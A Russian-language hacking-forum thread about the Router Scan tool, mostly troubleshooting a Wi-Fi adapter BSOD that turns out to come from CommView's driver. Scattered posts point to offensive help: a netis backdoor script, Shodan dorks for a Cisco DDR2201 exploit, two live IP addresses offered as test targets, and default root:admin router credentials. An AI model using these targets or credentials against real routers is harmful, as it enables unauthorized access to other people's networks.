А со вскрытым алгоритмом и брутить не надо. Сгенерировал пароль за секунду, и пошел. Обычно sha, des или md5 от мак адреса и иногда серийника, иногда самописный блочный шифр. Европейцы ломают сети так.



Скоро(ненавижу этот термин ), на рынок выпадут фермы эфириума(итд). Б/У параллельные вычислители(видеокарты), станут дешеветь. Много идиотов, которые хотели срубить бабла "вычислениями" пирамиды(МММ) .. начнут избавляться от мощных железок(у кого хватит ума вовремя выпрыгнуть).

Звёздный час, для сборки вычислительных мощностей для брута, из железа которое прошло огонь и воду, и точно не имеет "детских болезней".

Более того, некоторые производители материнок провтыкали спрос(на фермы), и выпустили тематические наборы системной логики слишком поздно, и следовательно будут избавляться от такой "продукции" по бросовой цене(фермы больше не нужны). - Инерция заводов(корпораций). Херовые аналитики.

Hose12
27.07.2017, 11:17
Замучали BSODы, каждые 10 минут в среднем и чаще иногда.

Win10, TP-LINK 722N, подключение только по WIFI (проводного интернета нет)

При скане Роутер сканом, вылетают бсоды постоянные.

При обычной работе адаптера (серф инета, игры и так далее) бсоды не появляются.

Где можно капнуть чтобы пофиксить это ?

mamoru
27.07.2017, 11:32
Замучали BSODы, каждые 10 минут в среднем и чаще иногда.

Win10, TP-LINK 722N, подключение только по WIFI (проводного интернета нет)

При скане Роутер сканом, вылетают бсоды постоянные.

При обычной работе адаптера (серф инета, игры и так далее) бсоды не появляются.

Где можно капнуть чтобы пофиксить это ?



Начать с ошибки которую показывает bsod.

Hose12
27.07.2017, 11:40
Начать с ошибки которую показывает bsod.



Никакого кода - просто security check kernel бла бла бла, без кода ошибки.

binarymaster
27.07.2017, 12:00
Никакого кода - просто security check kernel бла бла бла, без кода ошибки.



Скриншот в студию!

mamoru
27.07.2017, 12:05
А как он скрин сделает при синем экране? Только разве что фотку с телефона.


на ботинок

mamoru
27.07.2017, 12:08
Никакого кода - просто security check kernel бла бла бла, без кода ошибки.



Раз уж ты еще ничего не пытался предпринять для решения проблемы, вот тебе для начала https://google.gik-team.com/?q=bsod+security+check+kernel

Hose12
27.07.2017, 12:11
Раз уж ты еще ничего не пытался предпринять для решения проблемы, вот тебе для начала https://google.gik-team.com/?q=bsod+security+check+kernel



Если кто дурак, и не понял - я уже все это читал, в посте своём указал четкую причину выпаданий бсодов, с такими ответами умник помолчи-ка лучше.

binarymaster
27.07.2017, 12:18
в посте своём указал четкую причину выпаданий бсодов



Где?

Даже если bugcheck выпадает без кода, то по крайней мере указывается имя драйвера ядра, в котором произошёл сбой.

Hose12
27.07.2017, 12:21
http://savepic.net/9526395.htm

Ossen
27.07.2017, 12:22
Интересно эт что за роутер такой? вроде в списке его нет SNR-CPE-W4N

binarymaster
27.07.2017, 12:24
http://savepic.net/9526395.htm



М-да... это тебе не православный бсод со всеми системными данными, как в XP или 7.

Придётся минидамп изучать. Одно известно точно - KERNEL_SECURITY_CHECK_FAILURE.



Никакого кода - просто security check kernel бла бла бла



Не просто:

https://docs.microsoft.com/en-us/wi...bug-check-0x139-kernel-security-check-failure

Kakoluk
27.07.2017, 12:32
http://savepic.net/9526395.htm



А вы не пробовали(ради поиска истины) поочерёдно вырубать устройства в Бивисе(и Батхеде)? Что бы методом исключения определить место сбоя(раз уж нет первичной диагностики как в XP и 7)?

Hose12
27.07.2017, 12:35
Не пробовал, но по всему видно что эта ошибка идёт от адаптера tp link 722n в связке с роутерскан.

sha9
27.07.2017, 12:38
Не пробовал, но по всему видно что эта ошибка идёт от адаптера tp link 722n в связке с роутерскан.



а не может проблема быть в самой винде, точнее в сборке, не отключенных модулях шпионажа?

Hose12
27.07.2017, 12:39
Раньше я постоянно сканил не заморачиваясь прямо от прова - через проводной интернет.

БСОДы ни разу не беспокоили, только при откаже от проводов и скане через адаптер - начались проблемы.

Hose12
27.07.2017, 12:40
а не может проблема быть в самой винде, точнее в сборке, не отключенных модулях шпионажа?



Вся шпионская муть была отключена на стадии установки винды

mamoru
27.07.2017, 12:46
Если кто дурак, и не понял - я уже все это читал, в посте своём указал четкую причину выпаданий бсодов, с такими ответами умник помолчи-ка лучше.



Учись излагать проблему более ясно, что бы у пытающихся тебе помочь было меньше вопросов и больше ответов. За умника спасибо, сладкий :*

binarymaster
27.07.2017, 12:49
ошибка идёт от адаптера tp link 722n в связке с роутерскан



Попробуйте обновить драйвер адаптера (если устаревший), либо наоборот откатить на другую версию (если последняя версия).

Veil
27.07.2017, 12:56
http://savepic.net/9526395.htm



Вот к чему приводит отказ от классического синего окна смерти. Процесс идентификации конфликта будет довольно сильно затянут. Сделали называется для удобства и облегчения работы юзера.

Майкрософт по моему уже начал жопой думать.

Hose12
27.07.2017, 12:59
Попробуйте обновить драйвер адаптера (если устаревший), либо наоборот откатить на другую версию (если последняя версия).



Откатился на прошлую версию драйвера адаптера, протестирую отпишусь о результатах.

Ossen
27.07.2017, 13:00
Вот к чему приводит отказ от классического синего окна смерти.



Да было такое на моей десятке дня два назад восстановился стандартно диагностикой и исправлением ошибок

mamoru
27.07.2017, 13:03
Вот к чему приводит отказ от классического синего окна смерти. Процесс идентификации будет довольно сильно затянут. Сделали называется для удобства и облегчения работы юзера.

Майкрософт по моему уже начал жопой думать.



Не совсем ясно как изменение информативности синего экрана может повлиять на удобство работы юзера, а вот с второй частью согласен.

При работе в win8-10 ощущение, что стоишь голым в толпе и тобой еще руководят.

Kakoluk
27.07.2017, 13:03
Да было такое на моей десятке дня два назад восстановился стандартно диагностикой и исправлением ошибок



100%-тный вопрос. - А вы поняли почему она(10) отказала?

Veil
27.07.2017, 13:05
Не совсем ясно как изменение информативности синего экрана может повлиять на удобство работы юзера, а вот с второй частью согласен.

При работе в win8-10 ощущение, что стоишь голым в толпе и тобой еще руководят.



А ты подумай сам. Как ИЗМЕНЕНИЕ или ОТСУТСТВИЕ может повлиять?

Ossen
27.07.2017, 13:05
100%-тный вопрос. - А вы поняли почему она(10) отказала?



Судя по всему связано с usb портами да и недавно обнова на неё прилетала

Veil
27.07.2017, 13:08
Судя по всему связано с usb портами да и недавно обнова на неё прилетала



ЭТО УЖЕ ГАДАНИЕ НА КОФЕЙ ГУЩЕ.

А вопрос был ты точно нашел ЭТУ ошибку? Так или я ошибаюсь?

V777
27.07.2017, 13:09
А я 10 й доволен ...

Ossen
27.07.2017, 13:10
прошлую версию драйвера адаптера



? у вас адаптер realtek или atheros

Veil
27.07.2017, 13:11
А я 10 й доволен ...



И я доволен, что у меня её нет.

Пользуюсь старой, православной семеркой.

V777
27.07.2017, 13:12
И я доволен, что у меня её нет.

Пользуюсь старой, православной семеркой.



Была 7 ну её на..

и как часто перестанавливаешь ? на год раза 2 мин

Hose12
27.07.2017, 13:13
? у вас адаптер realtek или atheros



atheros

binarymaster
27.07.2017, 13:13
И я доволен, что у меня её нет.

Пользуюсь старой, православной семеркой.






и как часто перестанавливаешь ? на год раза 2 мин



Пользуюсь 7-кой с 2011 года, без антивируса, ни одной переустановки с тех пор.

V777
27.07.2017, 13:13
atheros



железо старое ?

Ossen
27.07.2017, 13:14
А вопрос был ты точно нашел ЭТУ ошибку? Так или я ошибаюсь?



я уткнулся в два варианта usb порт и сетевой адаптер диагностика стандартными средствами десятки помогла на всё про всё ушло где то пол часа

V777
27.07.2017, 13:14
Пользуюсь 7-кой с 2011 года, без антивируса, ни одной переустановки с тех пор.


Переходи на 10 ..

binarymaster
27.07.2017, 13:15
Переходи на 10 ..



http://i.ytimg.com/vi/d1rb-tZuLAw/hqdefault.jpg

Работает - не трогай.

V777
27.07.2017, 13:15
atheros



Думаю твой паровоз не поддерживает современные операционные системы , поэтому переходи на 7

Ossen
27.07.2017, 13:17
железо старое ?



железо новое если у вас atheros у меня realtek значит проблема с usb портами была

Veil
27.07.2017, 13:20
Была 7 ну её на..

и как часто перестанавливаешь ? на год раза 2 мин



Я постоянно, что-то кручу, верчу, ставлю. А так как у меня SSD без отката.Переустанавливаю наверное раз в три месяца. У меня сделан образ диска со всеми дровами и свистелками-перделками и переустановка занимает не более 5 минут.

mamoru
27.07.2017, 13:20
А ты подумай сам. Как ИЗМЕНЕНИЕ или ОТСУТСТВИЕ может повлиять?


Не получается. Подскажи, как удаление информации из bsod может добавить удобства и облегчения, для работы юзера?

V777
27.07.2017, 13:22
Я постоянно, что-то кручу, верчу, ставлю. А так как у меня SSD без отката.Переустанавливаю наверное раз в три месяца. У меня сделан образ диска со всеми дровами и свистелками-перделками и переустановка занимает не более 5 минут.



Вот и у меня когда была 7 то каждые 3 месяца перестанавливал .

Hose12
27.07.2017, 13:26
железо старое ?



v1 - работает пару лет.

P.S. 25 минут скана после отката дравйера - полёт нормальный, скорее всего проблема была в драйвере, даже дата драйвера внушала подозрение.

Причем драйвер этот 2024 года выпуска - ставится автоматически при попытке обновить драйвер в диспетчере.

http://savepic.net/9551999.htm

Veil
27.07.2017, 13:28
Не получается. Подскажи, как удаление информации из bsod может добавить удобства и облегчения, для работы юзера?



По крайней мере при получение информации из bsod код ошибки, ты видишь в каком направлении работать.

А здесь ты ничего не видишь и начинаешь гадать. Грубо говоря ищешь методом научного тыка.

Kakoluk
27.07.2017, 13:30
А я 10 й доволен ...



Филосовский вопрос.

Понимаете, доилка безчувственна. Она создана только чтоб доить. Всё остальное должно идти на бойню. "Не трогайте меня, мой тостер и ванну, оставьте меня в покое, и дайте наконец ещё красивых картинок".

Veil
27.07.2017, 13:31
Вот и у меня когда была 7 то каждые 3 месяца перестанавливал .



Бывает залезешь не удачно и не туда. И сразу начинаешь полировать диск и устанавливать все чистое.

А так как я довольно часто пытаюсь залезть не туда. То так и выходит.

V777
27.07.2017, 13:34
драйвер этот 2024 года выпуска

Veil
27.07.2017, 13:36
Осталось только найти Адаптер 2024 года выпуска и никаких конфликтов.

sha9
27.07.2017, 13:43
кстати, по поводу нетисов. есть какие идеи как обойти дефолт?

например http://212.28.71.34:8080 посылает по факсу. не дает даже стартовой страницы с пасом под звездочками, как все нормальные нетисы. а по этому диапазону 212.28.64.0/19 таких куча....но не добраться.... возникает смутное подозрение в ТР...

п.с. наткнулся на один скрипт.

https://webcache.googleusercontent..../master/netis_backdoor.py+&cd=4&hl=ru&ct=clnk

но пока не разобрался.

Hose12
27.07.2017, 14:07
Проблема решена. Всем спасибо.

Отдельный респект binarymaster-у.

Проблема была действительно в драйвере адаптера.

Суть такова: прога CommView for WiFi - отказывается работать со стандартным драйвером адаптера (просто выдаёт предупреждение при старте и просит установить свой драйвер) и вот этот драйвер их как раз и создавал проблему при которой появлялись бсоды при работе RS.

Стандартный драйвер от туполинка и всё разрешилось.

Ну разве что от CommView for WiFi придётся отказаться.

stasstv
27.07.2017, 14:10
Думаю твой паровоз не поддерживает современные операционные системы , поэтому переходи на 7



Сижу на FreeBSD, куда мне переходить?

binarymaster
27.07.2017, 14:11
Суть такова: прога CommView for WiFi - отказывается работать со стандартным драйвером адаптера (просто выдаёт предупреждение при старте и просит установить свой драйвер) и вот этот драйвер их как раз и создавал проблему при которой появлялись бсоды при работе RS.



Всегда знал, что CommView for WiFi - проприетарное зло!

Hose12
27.07.2017, 14:19
Всегда знал, что CommView for WiFi - проприетарное зло!


Единственное что там хорошо - показывает клиентов подключенных к точкам, нет нужды грузить Линукс, а можно прямо в винде глянуть нет ли у нужной точки на данный момент клиентов.

V777
27.07.2017, 14:26
Единственное что там хорошо - показывает клиентов подключенных к точкам, нет нужды грузить Линукс, а можно прямо в винде глянуть нет ли у нужной точки на данный момент клиентов.



прямо в винде можно глянуть и через виртуалку

antis17
27.07.2017, 14:27
Единственное что там хорошо - показывает клиентов подключенных к точкам, нет нужды грузить Линукс, а можно прямо в винде глянуть нет ли у нужной точки на данный момент клиентов.



Можешь клиентов смотреть WifiChannelMonitor или Acrylic WiFi Professional.

exzet
27.07.2017, 18:19
При работе в win8-10 ощущение, что стоишь голым в толпе и тобой еще руководят.



10 LTSB вполне годная, там весь лишний хлам выпилен - никакого метро и шпионской кортаны. Плюс обновления прилетают только после того как их обкатают(не считая критических) на хомяках, и только самые необходимые.



Проблема была действительно в драйвере адаптера



С вафлями там действительно проблема. Точнее в тех дровах, что предлагает 10. Сродными дровами даже CommView летает.



Суть такова: прога CommView for WiFi - отказывается работать со стандартным драйвером адаптера (просто выдаёт предупреждение при старте и просит установить свой драйвер) и вот этот драйвер их как раз и создавал проблему при которой появлялись бсоды при работе RS.



По моему этот драйвер подгружается только когда запущен CommView, а при закрытии программы подгружается родной дров.

Alexandr ITLab
27.07.2017, 20:05
А как насчет прикрутить возможность в базу писать координаты точки измерения с уберфичи с внешнего или внутреннего GPS приемника?

Сразу бы стало интереснее.

TOX1C
27.07.2017, 21:43
с внешнего или внутреннего GPS приемника?



Много ли знаешь моделей ноутов с gps приемниками? Да и не нужно как бы, имея инфу о всех точках в зоне приема, и зная координаты хоть одной, можно примерно прикинуть местонахождение остальных. Так же в базу можно грузить информацию о wps устройстве, для угадывателя девайса по мак адресу.

Alexandr ITLab
27.07.2017, 22:13
Задача иная: в определенной точке измерения четко сделать замер уровней сигналов точек доступа.

Triton_Mgn
27.07.2017, 22:36
Задача иная: в определенной точке измерения четко сделать замер уровней сигналов точек доступа.



И при чем тут RS? Это можно сделать vistumbler + usb gps. Сам так делал, точки определяются на карте с уровнем сигналов, в инете есть инструкция по настройке связки.

binarymaster
27.07.2017, 22:50
Задача иная: в определенной точке измерения четко сделать замер уровней сигналов точек доступа.



У @Fusix (https://forum.antichat.xyz/members/178746/) была идея прикрутить подобную функцию к Android приложению 3WiFi. Если он это сделает, то есть смысл поручить ему добавление этой же функциональности в RS.

Правда вестей от него давно нет на эту тему.

gaww
28.07.2017, 10:13
Не пробовал, но по всему видно что эта ошибка идёт от адаптера tp link 722n в связке с роутерскан.



У меня тоже самое с этим tp link 722n, редко но бывает. Это точно из за него.

binarymaster
29.07.2017, 11:54
интересный эксплойт на Cisco DDR2201

но что-то не получается найти дорк на шодане для эксперимента.



Судя по адресам страниц, это прошивка на базе Micro DSL.

Следовательно искать по Server: micro_httpd

exzet
29.07.2017, 12:00
Написано же



*Shodan Dork*

http.title:"Cisco DDR2201v1 ADSL2+ Residential Gateway"

http.title:"Cisco DDR2200 ADSL2+ Residential Gateway"




Вот рабочие

http://190.166.53.55:8080

http://148.0.194.223:8080

sha9
29.07.2017, 21:39
Написано же



спасибо за помощь. то, что в описании эксплойта указан дорк я видел. видимо неправильно выразился. почему-то у меня он на шодане не срабатывал. ничего не выдавал по запросу.



Судя по адресам страниц, это прошивка на базе Micro DSL.

Следовательно искать по Server: micro_httpd



по этому запросу тоже искал. нашел парочку, но видимо что-то не то. конфиг скачивает, а в конфиге только парочка html тегов в тех айпишиках, что нашел exet все намного лучше

exzet
30.07.2017, 21:39
спасибо за помощь. то, что в описании эксплойта указан дорк я видел. видимо неправильно выразился. почему-то у меня он на шодане не срабатывал. ничего не выдавал по запросу.



Может ошибка при копировании дорка была? Там если первый или последний символ отсутствует, то ничего не найдет, точнее выдаст ошибку. А так все находит, только очень много протухших айпи.

sha9
30.07.2017, 22:41
Может ошибка при копировании дорка была? Там если первый или последний символ отсутствует, то ничего не найдет, точнее выдаст ошибку. А так все находит, только очень много протухших айпи.



да.потом разобрался.лишний пробел воткнул и не заметил а айпишников действительно много протухших. вот искал парочку айпишников проверить сплойт на роутер белл(такое старое дсл-г...) и вестерн дигитал айклод.нашел только в индии и ни один айпишник не отвечает

Kakoluk
31.07.2017, 13:12
Прошу добавить определение для новой прошивки(Ростелеком) Huawei HG8245H.

У всех пара root:admin

https://yadi.sk/d/wX-7y6us3La3FV

И посмотреть QTECH QBR-1041WU MTS. (engineer:amplifier:...:161)

Прошивки одни и те же, вплоть до даты/времени, но не определяются:

https://yadi.sk/d/1VNpG2fi3LaA9k

binarymaster
01.08.2017, 00:30
Программулина, как я понял, портабельна



А то!

Triton_Mgn
01.08.2017, 14:53
Ждем офф релиз с хелпом, чтобы не задавать вопросов .

gentux
02.08.2017, 00:40
Может с выходом офф. релиза @binarymaster (https://forum.antichat.xyz/members/148032/) создаст новую тему, у него появится редактирование ОП поста, новичкам легче найти программу, да и тема разрослась.

И еще, в linux под wine хотелось бы новую фишку.

https://habrastorage.org/web/6fe/08f/92f/6fe08f92fc4840d7a74a26e08f013d93.png

https://habrastorage.org/web/6fe/08f/92f/6fe08f92fc4840d7a74a26e08f013d93.png

binarymaster
02.08.2017, 01:01
И еще, в linux под wine хотелось бы новую фишку.

https://habrastorage.org/web/6fe/08f/92f/6fe08f92fc4840d7a74a26e08f013d93.png



Это надо разработчикам Wine писать, чтобы доделали прослойку WLAN API.

Paradiz
02.08.2017, 11:07
http://cdn1.savepice.ru/uploads/2017/8/2/0a5c8f6eec423900e0af86aaebeba9cc-full.png

http://cdn1.savepice.ru/uploads/2017/8/2/dc408d7cf64615c7d3a9aa3af27cae3f-full.png

Что значат эти ошибки не могу загрузить результат сканирования на 3wifi

exzet
02.08.2017, 11:10
Само сканирование айпишников подпадает под статью, могут ли это увидеть те, кого я сканирую?



Увидеть могут(особенно те, кто напрямую подключен), но под статью не попадает.

binarymaster
02.08.2017, 11:11
Что значат эти ошибки не могу загрузить результат сканирования на 3wifi



Слишком много насканировали, память испортилась. Пока программа не зависла, скопируйте через Ctrl+C таблицу в какой-нибудь текстовый файл.

Triton_Mgn
02.08.2017, 11:12
Интересен вопрос: сабж и закон. Само сканирование айпишников подпадает под статью, могут ли это увидеть те, кого я сканирую? Где можно почитать про этом и шоб на пальцах?

Про взлом вафли в целом понятно, а другие "операции"?



Еба статья 159 мошенничство. еще чего надо?

Ты как та девушка - безопасный..

Kakoluk
02.08.2017, 11:13
TP-LINK TL-WR740N начиная с 4-той ревизии, даже на родной прошивке, очень неплох для не особо большой сети, а с альтернативными прошивками

- вообще зверь. И за смешные деньги. И да, мне тоже тплинки нравятся.

У меня такой на углу кирпичного здания в гермокоробке прикручен и смотрит на жилой дом.

Лето и жару уже пережил, теперь на очереди зима. В спецификации пишут от ~+50 до ~-40.

Проверим.


Древний оффтоп. (вспомнил) Прошу прощения что в этой ветке(не знаю куда положить). Пусть тут и остаётся.

https://yadi.sk/i/LCLoq3ZS3Le8aF

https://yadi.sk/i/joBbWfYs3Le8cH

Второе лето эксплуатации заканчивается, было всякое: грозы/морозы/жаруны/грады.

Без единого сбоя(один раз только шину питания оборвало ветром в месте скрутки). Отличные электролиты, хорошая сборка готовая для outdoor.

Знаю, выглядит несерьёзно, но всё делалось по принципу: "Я тебя слепила из того что было, а потом что было..." (c)

Paradiz
02.08.2017, 19:25
Если у меня ip показывает другой город это значит у меня серый ip?

Если да то как просканировать внутреннею подсеть и есть ли шанс что соседние точки попадут в эту подсеть или они никак не связаны?

binarymaster
02.08.2017, 19:40
Если у меня ip показывает другой город это значит у меня серый ip?



Нет, это означает, что у вас крупный интернет провайдер, и город определяется тот, в котором этот провайдер преобладает больше всего.



Если да то как просканировать внутреннею подсеть



Серый ли у вас IP - смотрите в настройках (статусе) WAN вашего роутера.



и есть ли шанс что соседние точки попадут в эту подсеть или они никак не связаны?



Если всё правильно настроите, то шансы есть.

Paradiz
02.08.2017, 19:46
Нет, это означает, что у вас крупный интернет провайдер, и город определяется тот, в котором этот провайдер преобладает больше всего.

Серый ли у вас IP - смотрите в настройках (статусе) WAN вашего роутера.

Если всё правильно настроите, то шансы есть.



А как определить какой он серый/белый в разделе WAN

IP Address: 192.168.0.2 Dynamic IP